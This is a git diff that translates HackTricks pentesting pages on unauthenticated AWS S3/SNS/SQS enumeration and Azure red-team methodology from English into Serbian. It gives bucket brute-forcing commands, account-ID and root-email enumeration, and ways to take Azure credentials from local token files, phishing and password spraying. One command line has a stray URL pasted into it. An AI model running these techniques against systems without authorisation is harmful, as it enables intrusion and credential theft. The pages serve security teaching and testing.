 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
index 28c7b1673..74a55b8c6 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md
@@ -1,43 +1,43 @@
-# AWS - S3 Unauthenticated Enum
+# AWS - S3 Neautentifikovana Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## S3 Public Buckets
+## S3 Javne Kante
 
-A bucket is considered **“public”** if **any user can list the contents** of the bucket, and **“private”** if the bucket's contents can **only be listed or written by certain users**.
+Kanta se smatra **“javnom”** ako **bilo koji korisnik može da prikaže sadržaj** kante, i **“privatnom”** ako se sadržaj kante može **prikazati ili pisati samo od strane određenih korisnika**.
 
-Companies might have **buckets permissions miss-configured** giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note, that even with such misconfigurations some actions might not be able to be performed as buckets might have their own access control lists (ACLs).
+Kompanije mogu imati **pogrešno konfigurisane dozvole kanti** koje daju pristup ili svemu ili svima koji su autentifikovani u AWS-u u bilo kojem nalogu (dakle, bilo kome). Imajte na umu da čak i sa takvim pogrešnim konfiguracijama neke radnje možda neće moći da se izvrše jer kante mogu imati svoje vlastite liste kontrole pristupa (ACL).
 
-**Learn about AWS-S3 misconfiguration here:** [**http://flaws.cloud**](http://flaws.cloud/) **and** [**http://flaws2.cloud/**](http://flaws2.cloud)
+**Saznajte više o AWS-S3 pogrešnoj konfiguraciji ovde:** [**http://flaws.cloud**](http://flaws.cloud/) **i** [**http://flaws2.cloud/**](http://flaws2.cloud)
 
-### Finding AWS Buckets
+### Pronalaženje AWS Kanti
 
-Different methods to find when a webpage is using AWS to storage some resources:
+Različite metode za pronalaženje kada veb stranica koristi AWS za skladištenje nekih resursa:
 
-#### Enumeration & OSINT:
+#### Enumeracija & OSINT:
 
-- Using **wappalyzer** browser plugin
-- Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History.
-- **Check for resources** in domains like:
+- Korišćenje **wappalyzer** dodatka za pregledač
+- Korišćenje burp-a (**spidering** veba) ili ručnim navigiranjem kroz stranicu, svi **resursi** **učitani** će biti sačuvani u Istoriji.
+- **Proverite resurse** na domenima kao što su:
 
-  ```
-  http://s3.amazonaws.com/[bucket_name]/
-  http://[bucket_name].s3.amazonaws.com/
-  ```
+```
+http://s3.amazonaws.com/[bucket_name]/
+http://[bucket_name].s3.amazonaws.com/
+```
 
-- Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com`
-- Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**.
-- The **bucket name** and the **bucket domain name** needs to be **the same.**
-  - **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`.
-  - To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/).
+- Proverite za **CNAMES** jer `resources.domain.com` može imati CNAME `bucket.s3.amazonaws.com`
+- Proverite [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), veb sa već **otkrivenim otvorenim kantama**.
+- **Ime kante** i **ime domena kante** moraju biti **ista.**
+- **flaws.cloud** je na **IP** 52.92.181.107 i ako odete tamo, preusmerava vas na [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Takođe, `dig -x 52.92.181.107` daje `s3-website-us-west-2.amazonaws.com`.
+- Da biste proverili da li je to kanta, možete takođe **posetiti** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/).
 
 #### Brute-Force
 
-You can find buckets by **brute-forcing name**s related to the company you are pentesting:
+Možete pronaći kante **brute-forcing** imena povezanih sa kompanijom koju testirate:
 
 - [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner)
 - [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector)
-- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names)
+- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Sadrži listu sa potencijalnim imenima kanti)
 - [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets)
 - [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky)
 - [https://github.com/tomdev/teh_s3_bucketeers](https://github.com/tomdev/teh_s3_bucketeers)
@@ -45,48 +45,47 @@ You can find buckets by **brute-forcing name**s related to the company you are p
 - [https://github.com/Eilonh/s3crets_scanner](https://github.com/Eilonh/s3crets_scanner)
 - [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter)
 
-
# Generate a wordlist to create permutations
+
# Generišite listu reči za kreiranje permutacija
 curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
 curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >>/tmp/words-s3.txt.temp
 cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
 
-# Generate a wordlist based on the domains and subdomains to test
-## Write those domains and subdomains in subdomains.txt
+# Generišite listu reči na osnovu domena i poddomena za testiranje
+## Zapišite te domene i poddomene u subdomains.txt
 cat subdomains.txt > /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
 cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt
 
-# Create permutations based in a list with the domains and subdomains to attack
+# Kreirajte permutacije na osnovu liste sa domenima i poddomenama za napad
 goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
-## The previous tool is specialized increating permutations for subdomains, lets filter that list
-### Remove lines ending with "."
+## Prethodni alat je specijalizovan za kreiranje permutacija za poddomene, filtrirajmo tu listu
+### Uklonite linije koje se završavaju sa "."
 cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
-### Create list without TLD
+### Kreirajte listu bez TLD
 cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
-### Create list without dots
+### Kreirajte listu bez tačaka
 cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4http://phantom.s3.amazonaws.com/
-### Create list without hyphens
+### Kreirajte listu bez crtica
 cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5
 
-## Generate the final wordlist
+## Generišite finalnu listu reči
 cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt
 
-## Call s3scanner
+## Pozovite s3scanner
 s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt  | grep bucket_exists
 

 
-#### Loot S3 Buckets
+#### Pljačka S3 Kanti
 
-Given S3 open buckets, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) can automatically **search for interesting information**.
+S obzirom na otvorene S3 kante, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) može automatski **tražiti zanimljive informacije**.
 
-### Find the Region
+### Pronađite Region
 
-You can find all the supported regions by AWS in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html)
+Možete pronaći sve podržane regione od strane AWS-a na [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html)
 
-#### By DNS
-
-You can get the region of a bucket with a **`dig`** and **`nslookup`** by doing a **DNS request of the discovered IP**:
+#### Preko DNS-a
 
+Možete dobiti region kante sa **`dig`** i **`nslookup`** tako što ćete uraditi **DNS zahtev otkrivene IP adrese**:
 ```bash
 dig flaws.cloud
 ;; ANSWER SECTION:
@@ -96,31 +95,29 @@ nslookup 52.218.192.11
 Non-authoritative answer:
 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
 ```
+Proverite da li rešen domen sadrži reč "website".\
+Možete pristupiti statičkoj veb stranici odlaskom na: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\
+ili možete pristupiti kanti posetom: `flaws.cloud.s3-us-west-2.amazonaws.com`
 
-Check that the resolved domain have the word "website".\
-You can access the static website going to: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\
-or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com`
+#### Pokušavajući
 
-#### By Trying
-
-If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**:
+Ako pokušate da pristupite kanti, ali u **nazivu domena navedete drugu regiju** (na primer, kanta je u `bucket.s3.amazonaws.com`, ali pokušavate da pristupite `bucket.s3-website-us-west-2.amazonaws.com`, tada ćete biti **upučeni na ispravnu lokaciju**:
 
 ![](<../../../images/image (106).png>)
 
-### Enumerating the bucket
+### Enumeracija kante
 
-To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored.
+Da biste testirali otvorenost kante, korisnik može jednostavno uneti URL u svoj veb pregledač. Privatna kanta će odgovoriti sa "Pristup odbijen". Javna kanta će navesti prvih 1.000 objekata koji su sačuvani.
 
-Open to everyone:
+Otvoreno za sve:
 
 ![](<../../../images/image (201).png>)
 
-Private:
+Privatno:
 
 ![](<../../../images/image (83).png>)
 
-You can also check this with the cli:
-
+Takođe možete proveriti ovo pomoću cli:
 ```bash
 #Use --no-sign-request for check Everyones permissions
 #Use --profile  to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions
@@ -128,22 +125,18 @@ You can also check this with the cli:
 #Opcionally you can select the region if you now it
 aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile ] [ --recursive] [--region us-west-2]
 ```
+Ako kofa nema ime domena, prilikom pokušaja da je enumerišete, **samo stavite ime kofe** i ne celu AWSs3 domenu. Primer: `s3://`
 
-If the bucket doesn't have a domain name, when trying to enumerate it, **only put the bucket name** and not the whole AWSs3 domain. Example: `s3://`
-
-### Public URL template
-
+### Šablon javnog URL-a
 ```
 https://{user_provided}.s3.amazonaws.com
 ```
+### Dobijanje ID-a naloga iz javnog Bucket-a
 
-### Get Account ID from public Bucket
-
-It's possible to determine an AWS account by taking advantage of the new **`S3:ResourceAccount`** **Policy Condition Key**. This condition **restricts access based on the S3 bucket** an account is in (other account-based policies restrict based on the account the requesting principal is in).\
-And because the policy can contain **wildcards** it's possible to find the account number **just one number at a time**.
-
-This tool automates the process:
+Moguće je odrediti AWS nalog koristeći novu **`S3:ResourceAccount`** **Ključ uslova politike**. Ovaj uslov **ograničava pristup na osnovu S3 bucket-a** u kojem se nalog nalazi (druge politike zasnovane na nalogu ograničavaju pristup na osnovu naloga u kojem se nalazi traženi princip).\
+I pošto politika može sadržati **džoker znakove**, moguće je pronaći broj naloga **samo jedan broj u isto vreme**.
 
+Ovaj alat automatizuje proces:
 ```bash
 # Installation
 pipx install s3-account-search
@@ -153,13 +146,11 @@ s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket
 # With an object
 s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket/path/to/object.ext
 ```
+Ova tehnika takođe funkcioniše sa API Gateway URL-ovima, Lambda URL-ovima, Data Exchange skupovima podataka, pa čak i za dobijanje vrednosti oznaka (ako znate ključ oznake). Možete pronaći više informacija u [**originalnom istraživanju**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) i alatu [**conditional-love**](https://github.com/plerionhq/conditional-love/) za automatizaciju ove eksploatacije.
 
-This technique also works with API Gateway URLs, Lambda URLs, Data Exchange data sets and even to get the value of tags (if you know the tag key). You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation.
-
-### Confirming a bucket belongs to an AWS account
-
-As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, if you have permissions to list a bucket** it’s possible to confirm an accountID the bucket belongs to by sending a request like:
+### Potvrđivanje da je kofa deo AWS naloga
 
+Kao što je objašnjeno u [**ovom blog postu**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, ako imate dozvole za listanje kofa** moguće je potvrditi accountID kojem kofa pripada slanjem zahteva poput:
 ```bash
 curl -X GET "[bucketname].amazonaws.com/" \
 -H "x-amz-expected-bucket-owner: [correct-account-id]"
@@ -167,41 +158,34 @@ curl -X GET "[bucketname].amazonaws.com/" \
 
 ...
 ```
+Ako je greška "Pristup odbijen", to znači da je ID naloga bio pogrešan.
 
-If the error is an “Access Denied” it means that the account ID was wrong.
-
-### Used Emails as root account enumeration
-
-As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), it's possible to check if an email address is related to any AWS account by **trying to grant an email permissions** over a S3 bucket via ACLs. If this doesn't trigger an error, it means that the email is a root user of some AWS account:
+### Korišćeni emailovi kao enumeracija root naloga
 
+Kao što je objašnjeno u [**ovom blog postu**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), moguće je proveriti da li je email adresa povezana sa nekim AWS nalogom tako što se **pokušava dodeliti email dozvole** nad S3 bucket-om putem ACL-ova. Ako ovo ne izazove grešku, to znači da je email root korisnik nekog AWS naloga:
 ```python
 s3_client.put_bucket_acl(
-    Bucket=bucket_name,
-    AccessControlPolicy={
-        'Grants': [
-            {
-                'Grantee': {
-                    'EmailAddress': 'some@emailtotest.com',
-                    'Type': 'AmazonCustomerByEmail',
-                },
-                'Permission': 'READ'
-            },
-        ],
-        'Owner': {
-            'DisplayName': 'Whatever',
-            'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef'
-        }
-    }
+Bucket=bucket_name,
+AccessControlPolicy={
+'Grants': [
+{
+'Grantee': {
+'EmailAddress': 'some@emailtotest.com',
+'Type': 'AmazonCustomerByEmail',
+},
+'Permission': 'READ'
+},
+],
+'Owner': {
+'DisplayName': 'Whatever',
+'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef'
+}
+}
 )
 ```
-
 ## References
 
 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
 - [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
index 7978eff36..e94890399 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
@@ -1,25 +1,21 @@
-# AWS - SNS Unauthenticated Enum
+# AWS - SNS Neautentifikovana Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## SNS
 
-For more information about SNS check:
+Za više informacija o SNS-u pogledajte:
 
 {{#ref}}
 ../aws-services/aws-sns-enum.md
 {{#endref}}
 
-### Open to All
+### Otvoreno za Sve
 
-When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic:
+Kada konfigurišete SNS temu iz web konzole, moguće je naznačiti da **Svi mogu objavljivati i pretplatiti se** na temu:
 
 

 
-So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**.
+Dakle, ako **pronađete ARN tema** unutar naloga (ili brute forcing potencijalnih imena za teme) možete **proveriti** da li možete **objavljivati** ili **pretplatiti se** na **njih**.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
index a5006a63b..e595b3cbb 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
@@ -1,27 +1,21 @@
-# AWS - SQS Unauthenticated Enum
+# AWS - SQS Neautentifikovana Enum
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## SQS
 
-For more information about SQS check:
+Za više informacija o SQS pogledajte:
 
 {{#ref}}
 ../aws-services/aws-sqs-and-sns-enum.md
 {{#endref}}
 
-### Public URL template
-
+### Javni URL šablon
 ```
 https://sqs.[region].amazonaws.com/[account-id]/{user_provided}
 ```
+### Proverite dozvole
 
-### Check Permissions
-
-It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them.
+Moguće je pogrešno konfigurisati politiku SQS reda i dodeliti dozvole svima u AWS-u da šalju i primaju poruke, pa ako dobijete ARN redova, pokušajte da li možete da im pristupite.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/README.md b/src/pentesting-cloud/azure-security/README.md
index 9d2de65fc..a0b521573 100644
--- a/src/pentesting-cloud/azure-security/README.md
+++ b/src/pentesting-cloud/azure-security/README.md
@@ -2,86 +2,85 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
 {{#ref}}
 az-basic-information/
 {{#endref}}
 
-## Azure Pentester/Red Team Methodology
+## Azure Pentester/Red Team Metodologija
 
-In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected.
+Da biste auditovali AZURE okruženje, veoma je važno znati: koje **usluge se koriste**, šta je **izloženo**, ko ima **pristup** čemu, i kako su interne Azure usluge i **eksterne usluge** povezane.
 
-From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that:
+Sa stanovišta Red Teama, **prvi korak za kompromitovanje Azure okruženja** je da se uspe da se dobiju neki **akreditivi** za Azure AD. Evo nekoliko ideja kako to uraditi:
 
-- **Leaks** in github (or similar) - OSINT
-- **Social** Engineering
-- **Password** reuse (password leaks)
-- Vulnerabilities in Azure-Hosted Applications
-  - [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint
-  - **Local File Read**
-    - `/home/USERNAME/.azure`
-    - `C:\Users\USERNAME\.azure`
-    - The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text**
-    - The file **`azureProfile.json`** contains **info** about logged user.
-    - **`az logout`** removes the token.
-    - Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\
-      Use `Disconnect-AzAccount` to remove them.
-- 3rd parties **breached**
-- **Internal** Employee
-- [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App)
-  - [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
+- **Leakovi** na github-u (ili sličnim mestima) - OSINT
+- **Socijalno** inženjerstvo
+- **Ponovna upotreba** lozinki (leakovi lozinki)
+- Ranljivosti u aplikacijama hostovanim na Azure-u
+- [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) sa pristupom metapodacima
+- **Čitanje lokalnih fajlova**
+- `/home/USERNAME/.azure`
+- `C:\Users\USERNAME\.azure`
+- Fajl **`accessTokens.json`** u `az cli` pre 2.30 - Jan2022 - čuvao je **pristupne tokene u čistom tekstu**
+- Fajl **`azureProfile.json`** sadrži **informacije** o prijavljenom korisniku.
+- **`az logout`** uklanja token.
+- Starije verzije **`Az PowerShell`** čuvale su **pristupne tokene** u **čistom** tekstu u **`TokenCache.dat`**. Takođe čuva **ServicePrincipalSecret** u **čistom** tekstu u **`AzureRmContext.json`**. Cmdlet **`Save-AzContext`** može se koristiti za **čuvanje** **tokena**.\
+Koristite `Disconnect-AzAccount` da ih uklonite.
+- 3. strane **provaljene**
+- **Interni** zaposleni
+- [**Uobičajeni Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (akreditivi ili Oauth aplikacija)
+- [Phishing putem autentifikacije uređaja](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md)
 - [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md)
 
-Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it:
+Čak i ako **niste kompromitovali nijednog korisnika** unutar Azure tenanta koji napadate, možete **prikupiti neke informacije** iz njega:
 
 {{#ref}}
 az-unauthenticated-enum-and-initial-entry/
 {{#endref}}
 
 > [!NOTE]
-> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration:
+> Nakon što ste uspeli da dobijete akreditive, morate znati **čijim akreditivima pripadaju**, i **čemu imaju pristup**, tako da treba da izvršite neku osnovnu enumeraciju:
 
-## Basic Enumeration
+## Osnovna Enumeracija
 
 > [!NOTE]
-> Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself.
+> Zapamtite da je **najbučniji** deo enumeracije **prijava**, a ne sama enumeracija.
 
 ### SSRF
 
-If you found a SSRF in a machine inside Azure check this page for tricks:
+Ako ste pronašli SSRF na mašini unutar Azure-a, proverite ovu stranicu za trikove:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf
 {{#endref}}
 
-### Bypass Login Conditions
+### Zaobilaženje Uslova Prijave
 
 

 
-In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place:
+U slučajevima kada imate neke važeće akreditive, ali ne možete da se prijavite, ovo su neke uobičajene zaštite koje bi mogle biti na snazi:
 
-- **IP whitelisting** -- You need to compromise a valid IP
-- **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least)
-- **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses.
-- You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed
+- **IP beljenje** -- Morate kompromitovati važeći IP
+- **Geo ograničenja** -- Pronađite gde korisnik živi ili gde su kancelarije kompanije i dobijte IP iz istog grada (ili barem iz iste zemlje)
+- **Pregledač** -- Možda je dozvoljen samo pregledač sa određenog OS-a (Windows, Linux, Mac, Android, iOS). Saznajte koji OS koristi žrtva/kompanija.
+- Takođe možete pokušati da **kompromitujete akreditive Service Principal-a** jer su obično manje ograničeni i njihova prijava se manje proverava.
 
-After bypassing it, you might be able to get back to your initial setup and you will still have access.
+Nakon zaobilaženja, možda ćete moći da se vratite na svoju početnu postavku i još uvek imate pristup.
 
-### Subdomain Takeover
+### Preuzimanje Poddomena
 
 - [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/)
 
 ### Whoami
 
 > [!CAUTION]
-> Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section.
+> Naučite **kako da instalirate** az cli, AzureAD i Az PowerShell u [**Az - Entra ID**](az-services/az-azuread.md) sekciji.
 
-One of the first things you need to know is **who you are** (in which environment you are):
+Jedna od prvih stvari koje treba da znate je **ko ste vi** (u kojem okruženju se nalazite):
 
 {{#tabs }}
 {{#tab name="az cli" }}
-
 ```bash
 az account list
 az account tenant list # Current tenant info
@@ -90,22 +89,18 @@ az ad signed-in-user show # Current signed-in user
 az ad signed-in-user list-owned-objects # Get owned objects by current user
 az account management-group list #Not allowed by default
 ```
-
 {{#endtab }}
 
 {{#tab name="AzureAD" }}
-
 ```powershell
 #Get the current session state
 Get-AzureADCurrentSessionInfo
 #Get details of the current tenant
 Get-AzureADTenantDetail
 ```
-
 {{#endtab }}
 
 {{#tab name="Az PowerShell" }}
-
 ```powershell
 # Get the information about the current context (Account, Tenant, Subscription etc.)
 Get-AzContext
@@ -121,53 +116,49 @@ Get-AzResource
 Get-AzRoleAssignment # For all users
 Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 > [!CAUTION]
-> Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**.
+> Jedna od najvažnijih komandi za enumeraciju Azure-a je **`Get-AzResource`** iz Az PowerShell-a jer vam omogućava da **znate koje resurse vaš trenutni korisnik može da vidi**.
 >
-> You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources"
+> Istu informaciju možete dobiti u **web konzoli** odlaskom na [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) ili pretražujući "Svi resursi"
 
 ### ENtra ID Enumeration
 
-By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\
-You can find here a guide:
+Podrazumevano, svaki korisnik bi trebao imati **dovoljno dozvola za enumeraciju** stvari kao što su korisnici, grupe, uloge, servisni principi... (proverite [podrazumevane AzureAD dozvole](az-basic-information/#default-user-permissions)).\
+Ovde možete pronaći vodič:
 
 {{#ref}}
 az-services/az-azuread.md
 {{#endref}}
 
 > [!NOTE]
-> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\
-> In the following section you can check some ways to **enumerate some common services.**
+> Sada kada **imate neke informacije o vašim kredencijalima** (i ako ste red tim, nadamo se da **niste otkriveni**). Vreme je da saznate koje se usluge koriste u okruženju.\
+> U sledećem odeljku možete proveriti neke načine za **enumeraciju nekih uobičajenih usluga.**
 
 ## App Service SCM
 
-Kudu console to log in to the App Service 'container'.
+Kudu konzola za prijavu u 'container' App Service-a.
 
 ## Webshell
 
-Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account.
+Koristite portal.azure.com i izaberite shell, ili koristite shell.azure.com, za bash ili powershell. 'Disk' ovog shell-a se čuva kao slika u storage-account-u.
 
 ## Azure DevOps
 
-Azure DevOps is separate from Azure. It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets.
+Azure DevOps je odvojen od Azure-a. Ima repozitorijume, pipeline-ove (yaml ili release), table, wiki i još mnogo toga. Grupa varijabli se koristi za čuvanje vrednosti varijabli i tajni.
 
 ## Debug | MitM az cli
 
-Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
-
+Koristeći parametar **`--debug`** moguće je videti sve zahteve koje alat **`az`** šalje:
 ```bash
 az account management-group list --output table --debug
 ```
-
-In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
+Da biste izvršili **MitM** na alat i **proverili sve zahteve** koje šalje ručno, možete uraditi: 
 
 {{#tabs }}
 {{#tab name="Bash" }}
-
 ```bash
 export ADAL_PYTHON_SSL_NO_VERIFY=1
 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -180,25 +171,21 @@ export HTTP_PROXY="http://127.0.0.1:8080"
 openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
 export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
 ```
-
 {{#endtab }}
 
 {{#tab name="PS" }}
-
 ```bash
 $env:ADAL_PYTHON_SSL_NO_VERIFY=1
 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
 $env:HTTPS_PROXY="http://127.0.0.1:8080"
 $env:HTTP_PROXY="http://127.0.0.1:8080"
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-## Automated Recon Tools
+## Automatizovani alati za rekognosciranje
 
 ### [**ROADRecon**](https://github.com/dirkjanm/ROADtools)
-
 ```powershell
 cd ROADTools
 pipenv shell
@@ -206,9 +193,7 @@ roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!"
 roadrecon gather
 roadrecon gui
 ```
-
 ### [Monkey365](https://github.com/silverhack/monkey365)
-
 ```powershell
 Import-Module monkey365
 Get-Help Invoke-Monkey365
@@ -216,9 +201,7 @@ Get-Help Invoke-Monkey365 -Detailed
 Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue
 Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML
 ```
